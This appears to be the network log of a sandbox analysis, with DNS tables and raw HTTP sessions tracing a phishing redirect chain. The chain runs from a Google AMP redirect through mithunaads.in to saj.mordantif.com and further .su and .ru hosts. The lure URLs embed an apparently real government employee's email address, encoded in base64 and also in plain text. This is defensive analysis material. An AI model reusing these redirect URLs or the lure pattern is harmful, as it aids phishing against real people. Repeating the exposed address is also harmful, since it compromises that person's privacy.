                                                        Sep 13, 2024 15:07:29.888506889 CEST192.168.2.51.1.1.10x79b2Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:29.888676882 CEST192.168.2.51.1.1.10x11f4Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Sep 13, 2024 15:06:24.054640055 CEST1.1.1.1192.168.2.50xb202No error (0)www.google.com142.250.186.164A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:24.054816008 CEST1.1.1.1192.168.2.50x987fNo error (0)www.google.com65IN (0x0001)false
                                                        Sep 13, 2024 15:06:26.504132986 CEST1.1.1.1192.168.2.50x7be6No error (0)mithunaads.in92.204.40.196A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:27.300019026 CEST1.1.1.1192.168.2.50xed1fNo error (0)saj.mordantif.com65IN (0x0001)false
                                                        Sep 13, 2024 15:06:27.315351009 CEST1.1.1.1192.168.2.50x77b3No error (0)saj.mordantif.com172.67.148.27A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:27.315351009 CEST1.1.1.1192.168.2.50x77b3No error (0)saj.mordantif.com104.21.55.124A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:29.772283077 CEST1.1.1.1192.168.2.50xfafaNo error (0)hyu.prosolmi.su65IN (0x0001)false
                                                        Sep 13, 2024 15:06:29.813879013 CEST1.1.1.1192.168.2.50xe4abNo error (0)hyu.prosolmi.su188.114.97.3A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:29.813879013 CEST1.1.1.1192.168.2.50xe4abNo error (0)hyu.prosolmi.su188.114.96.3A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:29.891437054 CEST1.1.1.1192.168.2.50x6bdeNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:31.645800114 CEST1.1.1.1192.168.2.50x951cNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:31.645800114 CEST1.1.1.1192.168.2.50x951cNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:31.645800114 CEST1.1.1.1192.168.2.50x951cNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:31.645800114 CEST1.1.1.1192.168.2.50x951cNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:31.646476984 CEST1.1.1.1192.168.2.50xec44No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:31.646476984 CEST1.1.1.1192.168.2.50xec44No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:31.647064924 CEST1.1.1.1192.168.2.50x7877No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                        Sep 13, 2024 15:06:31.647464991 CEST1.1.1.1192.168.2.50x15eeNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:31.647464991 CEST1.1.1.1192.168.2.50x15eeNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:31.647774935 CEST1.1.1.1192.168.2.50xa5bNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                        Sep 13, 2024 15:06:31.653512955 CEST1.1.1.1192.168.2.50x70b7No error (0)hyu.prosolmi.su65IN (0x0001)false
                                                        Sep 13, 2024 15:06:31.657126904 CEST1.1.1.1192.168.2.50xb89fNo error (0)hyu.prosolmi.su188.114.96.3A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:31.657126904 CEST1.1.1.1192.168.2.50xb89fNo error (0)hyu.prosolmi.su188.114.97.3A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:32.238508940 CEST1.1.1.1192.168.2.50x71fcNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                        Sep 13, 2024 15:06:32.238508940 CEST1.1.1.1192.168.2.50x71fcNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:32.484081030 CEST1.1.1.1192.168.2.50xbcccNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:32.484081030 CEST1.1.1.1192.168.2.50xbcccNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:32.484081030 CEST1.1.1.1192.168.2.50xbcccNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:32.484081030 CEST1.1.1.1192.168.2.50xbcccNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:32.485999107 CEST1.1.1.1192.168.2.50x64eaNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                        Sep 13, 2024 15:06:32.486182928 CEST1.1.1.1192.168.2.50x355dNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:32.486182928 CEST1.1.1.1192.168.2.50x355dNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:33.012026072 CEST1.1.1.1192.168.2.50xbb78No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                        Sep 13, 2024 15:06:33.014615059 CEST1.1.1.1192.168.2.50x1e58No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:33.014615059 CEST1.1.1.1192.168.2.50x1e58No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:33.025237083 CEST1.1.1.1192.168.2.50x191bNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:33.025237083 CEST1.1.1.1192.168.2.50x191bNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:33.025836945 CEST1.1.1.1192.168.2.50x3939No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                        Sep 13, 2024 15:06:33.774199009 CEST1.1.1.1192.168.2.50x684dNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:06:33.774199009 CEST1.1.1.1192.168.2.50x684dNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:00.569746971 CEST1.1.1.1192.168.2.50xc0d6No error (0)saj.mordantif.com104.21.55.124A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:00.569746971 CEST1.1.1.1192.168.2.50xc0d6No error (0)saj.mordantif.com172.67.148.27A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:00.596065044 CEST1.1.1.1192.168.2.50xb81eNo error (0)saj.mordantif.com65IN (0x0001)false
                                                        Sep 13, 2024 15:07:04.529043913 CEST1.1.1.1192.168.2.50x7acdNo error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                        Sep 13, 2024 15:07:04.529043913 CEST1.1.1.1192.168.2.50x7acdNo error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.78A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:04.529043913 CEST1.1.1.1192.168.2.50x7acdNo error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.5A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:04.529043913 CEST1.1.1.1192.168.2.50x7acdNo error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.33A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:04.529043913 CEST1.1.1.1192.168.2.50x7acdNo error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.89A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:04.529326916 CEST1.1.1.1192.168.2.50x28bNo error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                        Sep 13, 2024 15:07:04.530024052 CEST1.1.1.1192.168.2.50xb246No error (0)github.com140.82.121.4A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:04.532140017 CEST1.1.1.1192.168.2.50x6beaNo error (0)www.google.com216.58.206.68A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:04.532788992 CEST1.1.1.1192.168.2.50x3a79No error (0)www.google.com65IN (0x0001)false
                                                        Sep 13, 2024 15:07:04.540014029 CEST1.1.1.1192.168.2.50xea5eNo error (0)ok4static.oktacdn.comd19d360lklgih4.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                        Sep 13, 2024 15:07:04.542010069 CEST1.1.1.1192.168.2.50xb0eNo error (0)ok4static.oktacdn.comd19d360lklgih4.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                        Sep 13, 2024 15:07:04.542010069 CEST1.1.1.1192.168.2.50xb0eNo error (0)d19d360lklgih4.cloudfront.net13.33.187.120A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:04.542010069 CEST1.1.1.1192.168.2.50xb0eNo error (0)d19d360lklgih4.cloudfront.net13.33.187.96A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:04.542010069 CEST1.1.1.1192.168.2.50xb0eNo error (0)d19d360lklgih4.cloudfront.net13.33.187.68A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:04.542010069 CEST1.1.1.1192.168.2.50xb0eNo error (0)d19d360lklgih4.cloudfront.net13.33.187.14A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:05.453494072 CEST1.1.1.1192.168.2.50x81aaNo error (0)objects.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:05.453494072 CEST1.1.1.1192.168.2.50x81aaNo error (0)objects.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:05.453494072 CEST1.1.1.1192.168.2.50x81aaNo error (0)objects.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:05.453494072 CEST1.1.1.1192.168.2.50x81aaNo error (0)objects.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:05.473896027 CEST1.1.1.1192.168.2.50xf056No error (0)www.google.com65IN (0x0001)false
                                                        Sep 13, 2024 15:07:05.473999023 CEST1.1.1.1192.168.2.50x6e1dNo error (0)www.google.com142.250.184.196A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:05.797076941 CEST1.1.1.1192.168.2.50x9202No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                        Sep 13, 2024 15:07:05.797076941 CEST1.1.1.1192.168.2.50x9202No error (0)d2vgu95hoyrpkh.cloudfront.net3.161.119.88A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:05.797076941 CEST1.1.1.1192.168.2.50x9202No error (0)d2vgu95hoyrpkh.cloudfront.net3.161.119.44A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:05.797076941 CEST1.1.1.1192.168.2.50x9202No error (0)d2vgu95hoyrpkh.cloudfront.net3.161.119.114A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:05.797076941 CEST1.1.1.1192.168.2.50x9202No error (0)d2vgu95hoyrpkh.cloudfront.net3.161.119.70A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:05.799138069 CEST1.1.1.1192.168.2.50xfe56No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                        Sep 13, 2024 15:07:06.150087118 CEST1.1.1.1192.168.2.50xb811No error (0)objects.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:06.150087118 CEST1.1.1.1192.168.2.50xb811No error (0)objects.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:06.150087118 CEST1.1.1.1192.168.2.50xb811No error (0)objects.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:06.150087118 CEST1.1.1.1192.168.2.50xb811No error (0)objects.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:07.532867908 CEST1.1.1.1192.168.2.50xbcbdNo error (0)ok4static.oktacdn.comd19d360lklgih4.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                        Sep 13, 2024 15:07:07.532867908 CEST1.1.1.1192.168.2.50xbcbdNo error (0)d19d360lklgih4.cloudfront.net18.239.50.4A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:07.532867908 CEST1.1.1.1192.168.2.50xbcbdNo error (0)d19d360lklgih4.cloudfront.net18.239.50.48A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:07.532867908 CEST1.1.1.1192.168.2.50xbcbdNo error (0)d19d360lklgih4.cloudfront.net18.239.50.70A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:07.532867908 CEST1.1.1.1192.168.2.50xbcbdNo error (0)d19d360lklgih4.cloudfront.net18.239.50.41A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:07.538655996 CEST1.1.1.1192.168.2.50xf8ebNo error (0)ok4static.oktacdn.comd19d360lklgih4.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                        Sep 13, 2024 15:07:09.587565899 CEST1.1.1.1192.168.2.50x866cNo error (0)get.geojs.io104.26.1.100A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:09.587565899 CEST1.1.1.1192.168.2.50x866cNo error (0)get.geojs.io104.26.0.100A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:09.587565899 CEST1.1.1.1192.168.2.50x866cNo error (0)get.geojs.io172.67.70.233A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:09.588012934 CEST1.1.1.1192.168.2.50x3e99No error (0)get.geojs.io65IN (0x0001)false
                                                        Sep 13, 2024 15:07:10.245414019 CEST1.1.1.1192.168.2.50xd88eNo error (0)get.geojs.io172.67.70.233A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:10.245414019 CEST1.1.1.1192.168.2.50xd88eNo error (0)get.geojs.io104.26.0.100A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:10.245414019 CEST1.1.1.1192.168.2.50xd88eNo error (0)get.geojs.io104.26.1.100A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:10.247256041 CEST1.1.1.1192.168.2.50x1bbfNo error (0)get.geojs.io65IN (0x0001)false
                                                        Sep 13, 2024 15:07:10.365791082 CEST1.1.1.1192.168.2.50xe191No error (0)fipyf.orpkf.ru65IN (0x0001)false
                                                        Sep 13, 2024 15:07:10.372896910 CEST1.1.1.1192.168.2.50x96a0No error (0)fipyf.orpkf.ru172.67.179.134A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:10.372896910 CEST1.1.1.1192.168.2.50x96a0No error (0)fipyf.orpkf.ru104.21.43.126A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:12.415252924 CEST1.1.1.1192.168.2.50x4731No error (0)fipyf.orpkf.ru65IN (0x0001)false
                                                        Sep 13, 2024 15:07:12.478595972 CEST1.1.1.1192.168.2.50x7a4bNo error (0)fipyf.orpkf.ru104.21.43.126A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:12.478595972 CEST1.1.1.1192.168.2.50x7a4bNo error (0)fipyf.orpkf.ru172.67.179.134A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:15.834603071 CEST1.1.1.1192.168.2.50x5557No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:15.834603071 CEST1.1.1.1192.168.2.50x5557No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:29.895314932 CEST1.1.1.1192.168.2.50x79b2No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:33.171302080 CEST1.1.1.1192.168.2.50xd901No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                        Sep 13, 2024 15:07:33.171302080 CEST1.1.1.1192.168.2.50xd901No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                        • www.google.com
                                                        • mithunaads.in
                                                          • saj.mordantif.com
                                                        • https:
                                                          • hyu.prosolmi.su
                                                          • cdnjs.cloudflare.com
                                                          • challenges.cloudflare.com
                                                          • code.jquery.com
                                                          • github.com
                                                          • ok4static.oktacdn.com
                                                          • cdn.socket.io
                                                          • objects.githubusercontent.com
                                                          • get.geojs.io
                                                          • fipyf.orpkf.ru
                                                        • fs.microsoft.com
                                                        • a.nel.cloudflare.com
                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.54971492.204.40.196803624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 13, 2024 15:06:26.510157108 CEST476OUTGET /M/45043/aGFucy5hbmRlcnNvbkBhZy5zdGF0ZS5tbi51cw== HTTP/1.1
                                                        Host: mithunaads.in
                                                        Connection: keep-alive
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Sep 13, 2024 15:06:27.153841019 CEST265INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:06:27 GMT
                                                        Server: Apache
                                                        refresh: 0;url=https://SAj.mordantif.com/q8Yr/#Lhans.anderson@ag.state.mn.us
                                                        Content-Length: 0
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: text/html; charset=UTF-8
                                                        Sep 13, 2024 15:06:27.370841026 CEST418OUTGET /favicon.ico HTTP/1.1
                                                        Host: mithunaads.in
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Referer: http://mithunaads.in/M/45043/aGFucy5hbmRlcnNvbkBhZy5zdGF0ZS5tbi51cw==
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Sep 13, 2024 15:06:27.571888924 CEST1236INHTTP/1.1 404 Not Found
                                                        Date: Fri, 13 Sep 2024 13:06:27 GMT
                                                        Server: Apache
                                                        Keep-Alive: timeout=5, max=99
                                                        Connection: Keep-Alive
                                                        Transfer-Encoding: chunked
                                                        Content-Type: text/html; charset=UTF-8
                                                        Data Raw: 34 61 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 0d 0a 3a 3a 73 65 6c 65 63 74 69 6f 6e 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 45 31 33 33 30 30 3b 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 20 7d 0d 0a 3a 3a 2d 6d 6f 7a 2d 73 65 6c 65 63 74 69 6f 6e 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 45 31 33 33 30 30 3b 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 20 7d 0d 0a 0d 0a 62 6f 64 79 20 7b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 09 6d 61 72 67 69 6e 3a 20 34 30 70 78 3b 0d 0a 09 66 6f 6e 74 3a 20 31 33 70 78 2f 32 30 70 78 20 6e 6f 72 6d 61 6c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                        Data Ascii: 4a6<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>404 Page Not Found</title><style type="text/css">::selection { background-color: #E13300; color: white; }::-moz-selection { background-color: #E13300; color: white; }body {background-color: #fff;margin: 40px;font: 13px/20px normal Helvetica, Arial, sans-serif;color: #4F5155;}a {color: #003399;background-color: transparent;font-weight: normal;}h1 {color: #444;background-color: transparent;border-bottom: 1px solid #D0D0D0;font-size: 19px;font-weight: normal;margin: 0 0 14px 0;padding: 14px 15px 10px 15px;}code {font-family: Consolas, Monaco, Courier New, Courier, monospace;font-size: 12px;background-color: #f9f9f9;border: 1px solid #D0D0D0;color: #002166;display: block;margin: 14px 0 14px 0;padding: 12px 10px 12px 10px;}#container {margin: 10px;border: 1px solid #D0D0D0;box-shadow: 0 0 8px #D0D0D0;}p {ma [TRUNCATED]
                                                        Sep 13, 2024 15:06:27.571903944 CEST168INData Raw: 35 70 78 3b 0d 0a 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 09 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 09 09 3c 68 31 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e
                                                        Data Ascii: 5px;}</style></head><body><div id="container"><h1>404 Page Not Found</h1><p>The page you requested was not found.</p></div></body></html>0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.549710142.250.186.1644433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:06:24 UTC1058OUTGET /url?q=dCSMjVnvsqsqaP8pEWWm&rct=SpPq9HncUaCXUtCZusX0&sa=t&esrc=uZR6jk9A67Rj7RZhLuPE&source=&cd=eh0xIKCKpKh7i4kTt26p&cad=VEVtMkQKVNr1KW4fxShi&ved=NTDACygNXetEDbRT8YiY&uact=%20&url=amp/mithunaads.in/M%2f45043%2FaGFucy5hbmRlcnNvbkBhZy5zdGF0ZS5tbi51cw== HTTP/1.1
                                                        Host: www.google.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-User: ?1
                                                        Sec-Fetch-Dest: document
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:06:24 UTC1043INHTTP/1.1 302 Found
                                                        Location: https://www.google.com/amp/mithunaads.in/M/45043/aGFucy5hbmRlcnNvbkBhZy5zdGF0ZS5tbi51cw==
                                                        Cache-Control: private
                                                        Content-Type: text/html; charset=UTF-8
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-w-AY3IOfgIN984fqMNdX3A' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                        Permissions-Policy: unload=()
                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                        Date: Fri, 13 Sep 2024 13:06:24 GMT
                                                        Server: gws
                                                        Content-Length: 286
                                                        X-XSS-Protection: 0
                                                        Set-Cookie: NID=517=WAvHDQo9rXlVA_D7qBDiOgxhmpZ89HJycq3Y9gdpnS5ll8g5WhdhiYfdsaRX3V4ozs4YpMqq2M-92SZoOiJLG4ETue60Fve6SnphdxDx-JP5px97tStsOapKwSO2qkA4Wxb6HozFB1mvk8f4EutNee-LrItYewAmS1eoeaHIrfXyLjr-ZSSe9qJkIitU4oA; expires=Sat, 15-Mar-2025 13:06:24 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close
                                                        2024-09-13 13:06:24 UTC286INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 6d 70 2f 6d 69 74 68 75 6e 61 61 64 73 2e 69 6e 2f 4d 2f 34 35 30 34 33 2f 61 47 46 75 63 79 35 68 62 6d 52 6c 63 6e 4e 76 62 6b 42 68 5a 79 35 7a 64 47 46 30 5a 53 35 74 62 69 35 31 63 77
                                                        Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/amp/mithunaads.in/M/45043/aGFucy5hbmRlcnNvbkBhZy5zdGF0ZS5tbi51cw


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.549712142.250.186.1644433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:06:26 UTC1085OUTGET /amp/mithunaads.in/M/45043/aGFucy5hbmRlcnNvbkBhZy5zdGF0ZS5tbi51cw== HTTP/1.1
                                                        Host: www.google.com
                                                        Connection: keep-alive
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-User: ?1
                                                        Sec-Fetch-Dest: document
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: NID=517=WAvHDQo9rXlVA_D7qBDiOgxhmpZ89HJycq3Y9gdpnS5ll8g5WhdhiYfdsaRX3V4ozs4YpMqq2M-92SZoOiJLG4ETue60Fve6SnphdxDx-JP5px97tStsOapKwSO2qkA4Wxb6HozFB1mvk8f4EutNee-LrItYewAmS1eoeaHIrfXyLjr-ZSSe9qJkIitU4oA
                                                        2024-09-13 13:06:26 UTC838INHTTP/1.1 302 Found
                                                        Location: http://mithunaads.in/M/45043/aGFucy5hbmRlcnNvbkBhZy5zdGF0ZS5tbi51cw==
                                                        Cache-Control: private
